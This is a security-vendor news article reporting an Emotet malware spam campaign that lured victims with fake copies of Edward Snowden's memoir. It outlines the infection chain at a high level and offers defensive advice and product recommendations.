Emotet (detected by Trend Micro as TrojanSpy.Win32.EMOTET.THIBEAI) which recently resurfaced, is quick to expand its campaign to bank on the popularity of former CIA contractor and NSA whistleblower Edward Snowden’s bestselling memoir.
The cybercriminals behind this campaign sent out spam emails containing a Microsoft Word document pretending to be a free “Permanent Record” copy, luring victims to open the malicious document containing Emotet, according to a report from Malwarebytes.
This spam campaign had emails in different languages, including English, Italian, Spanish, German and French.
According to security researchers, once victims access the document, they will be prompted by a fake pop-up message to activate Microsoft Word. Upon clicking on the activation button, the malicious macro code will run in the background. It will then trigger a PowerShell command that connects to a compromised WordPress site. From there, Emotet and other malware variants like Trickbot will be downloaded to the victim’s machine and will connect to a command-and-control (C&C) server.
In 2014, Trend Micro discovered Emotet as a banking malware that sniffs out network activity for data theft purposes. Over the years, it has evolved. Armed with its own spamming module, Emotet has branched off to different industries and regions all over the world and has acquired sandbox- and analysis-evasion techniques.
In a comprehensive research published last year, Trend Micro experts examined how Emotet worked — leading to the discovery of at least two infrastructures running parallel to one another to support its botnet and its possible adoption of multilayer operating mechanisms in the creation of its artifacts.
This resurgent malware family is known for its evolving spam email content and its infectious nature. It does not stop at one infected machine — it can spread to other machines connected to a network and spread laterally.
According to the Department of Homeland Security, because of Emotet’s destructive nature, it can cost state, local, tribal, and territorial (SLTT) governments up to US$1 million per incident to fix.
The best way to remain protected against socially engineered scams is to be well informed of the different ways cybercriminals can trick you into being deceived.
In this particular spam campaign, social engineering is used to hook users into believing that they’re downloading a free copy of a popular book — only to be infected with Emotet.
These simple steps are key to making sure that you don’t fall for social engineering attacks:
Here are some of the best practices businesses can adopt to protect against Emotet and other threats that may come with it:
Trend Micro endpoint solutions that have behavior monitoring capabilities, like Smart Protection Suites and Worry-Free Business Security, can protect users and businesses from threats like Emotet by detecting malicious files, scripts, and messages as well as blocking all related malicious URLs. Trend Micro™ Apex One™ protection employs a variety of threat detection capabilities, notably behavioral analysis, which protect against malicious scripts, injection, ransomware, and memory and browser attacks.
The Trend Micro Deep Discovery™ solution has a layer for email inspection that can protect enterprises by detecting malicious attachments and URLs. It can detect remote scripts even if they are not being downloaded on the physical endpoints. The Trend Micro Deep Discovery™ Inspector solution protects customers from Emotet via this DDI rule:
Indicators of Compromise
|SHA-256||Trend Micro Predictive Machine Learning Detection||Trend Micro Patter Detection|
|Malicious Word Document
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.